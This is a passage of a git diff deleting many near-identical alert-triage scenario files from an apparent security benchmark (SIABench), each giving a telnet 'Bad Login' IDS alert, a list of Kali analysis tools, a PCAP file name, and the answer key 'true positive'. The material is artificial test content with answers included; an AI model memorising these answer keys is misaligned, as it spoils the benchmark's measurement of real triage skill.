need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json deleted file mode 100644 index 4a53ca6ea7d5a694e7eab23dae32a6b9e9e2bb44..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21608", - "alert_type": "True", - "alert_name": "dp_21608" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:39.917139+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51254", - "alert": "1970-01-02T00:11:39.917139+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51254", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json deleted file mode 100644 index 70fd46f45234116e195b2abf8645563e55a3e1ab..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21609", - "alert_type": "True", - "alert_name": "dp_21609" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:40.259245+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51268", - "alert": "1970-01-02T00:11:40.259245+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51268", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json deleted file mode 100644 index a9780506903f85a69322d1b78b1fb957a5f0d4ed..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21610", - "alert_type": "True", - "alert_name": "dp_21610" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:43.214053+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51282", - "alert": "1970-01-02T00:11:43.214053+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51282", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json deleted file mode 100644 index 178c3cf7b2d8506f356d6442476235d2652d3d39..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21618", - "alert_type": "True", - "alert_name": "dp_21618" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:54.926485+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "alert": "1970-01-02T00:11:54.926485+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json deleted file mode 100644 index 638d3b61b8b1b41da01bb93105211b3da3f20566..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21622", - "alert_type": "True", - "alert_name": "dp_21622" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:00.947600+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60270", - "alert": "1970-01-02T00:12:00.947600+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60270", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json deleted file mode 100644 index 8405438416be825f1fa840ac9f69946d1152677a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21627", - "alert_type": "True", - "alert_name": "dp_21627" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:08.418081+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "alert": "1970-01-02T00:12:08.418081+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json deleted file mode 100644 index e68fc1aebfca31701eaa2f1122edd1b9479e964a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21637", - "alert_type": "True", - "alert_name": "dp_21637" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:22.599290+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "alert": "1970-01-02T00:12:22.599290+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json deleted file mode 100644 index 7b4571d770c346dfc022cab1e56486105015da42..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21639", - "alert_type": "True", - "alert_name": "dp_21639" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:25.957969+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44164", - "alert": "1970-01-02T00:12:25.957969+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44164", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json deleted file mode 100644 index 3552f33bfff7e73baf3f295941e2eb9dc9e205e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21641", - "alert_type": "True", - "alert_name": "dp_21641" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:29.540379+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40434", - "alert": "1970-01-02T00:12:29.540379+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json deleted file mode 100644 index 2b73fb2969e7c7d03fd5b9273d90286788abe5f3..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21646", - "alert_type": "True", - "alert_name": "dp_21646" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:38.132186+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53534", - "alert": "1970-01-02T00:12:38.132186+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53534", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json deleted file mode 100644 index c44b96b50b6904b432f7d1fc84dfaee1f8f8196a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21650", - "alert_type": "True", - "alert_name": "dp_21650" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:41.820471+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53550", - "alert": "1970-01-02T00:12:41.820471+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53550", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json deleted file mode 100644 index fb4a9de8c881a644a20d9f53a6e29904ae0b367d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21654", - "alert_type": "True", - "alert_name": "dp_21654" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:49.946448+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "alert": "1970-01-02T00:12:49.946448+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json deleted file mode 100644 index 5e271e4a6ce6a561c0eb894f232057a462fb4270..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21656", - "alert_type": "True", - "alert_name": "dp_21656" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:52.442151+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43568", - "alert": "1970-01-02T00:12:52.442151+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43568", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json deleted file mode 100644 index f1b945c800e76670177fe5edb884d54329cb473f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21657", - "alert_type": "True", - "alert_name": "dp_21657" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:53.873953+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43572", - "alert": "1970-01-02T00:12:53.873953+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43572", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json deleted file mode 100644 index afad838c58afb40025b40a6d6ad731d46a86c724..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21658", - "alert_type": "True", - "alert_name": "dp_21658" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:53.983848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "alert": "1970-01-02T00:12:53.983848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json deleted file mode 100644 index 8c163f39ac56a412065e3d6741084a126b41cb8d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21660.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21660", - "alert_type": "True", - "alert_name": "dp_21660" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:56.521154+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43586", - "alert": "1970-01-02T00:12:56.521154+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43586", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json deleted file mode 100644 index 261aa4227a52b8aad045ce50ef994b02faab40e0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21661.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21661", - "alert_type": "True", - "alert_name": "dp_21661" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:59.361734+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56602", - "alert": "1970-01-02T00:12:59.361734+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56602", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json deleted file mode 100644 index 926460736e05f972759e61830ed7b78453ebb4d4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21662.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21662", - "alert_type": "True", - "alert_name": "dp_21662" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:59.859739+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "alert": "1970-01-02T00:12:59.859739+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json deleted file mode 100644 index db18fb7cc34ebcd903932d88dcaf06c2264dd2b7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21664.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21664", - "alert_type": "True", - "alert_name": "dp_21664" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:05.516840+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56612", - "alert": "1970-01-02T00:13:05.516840+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56612", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json deleted file mode 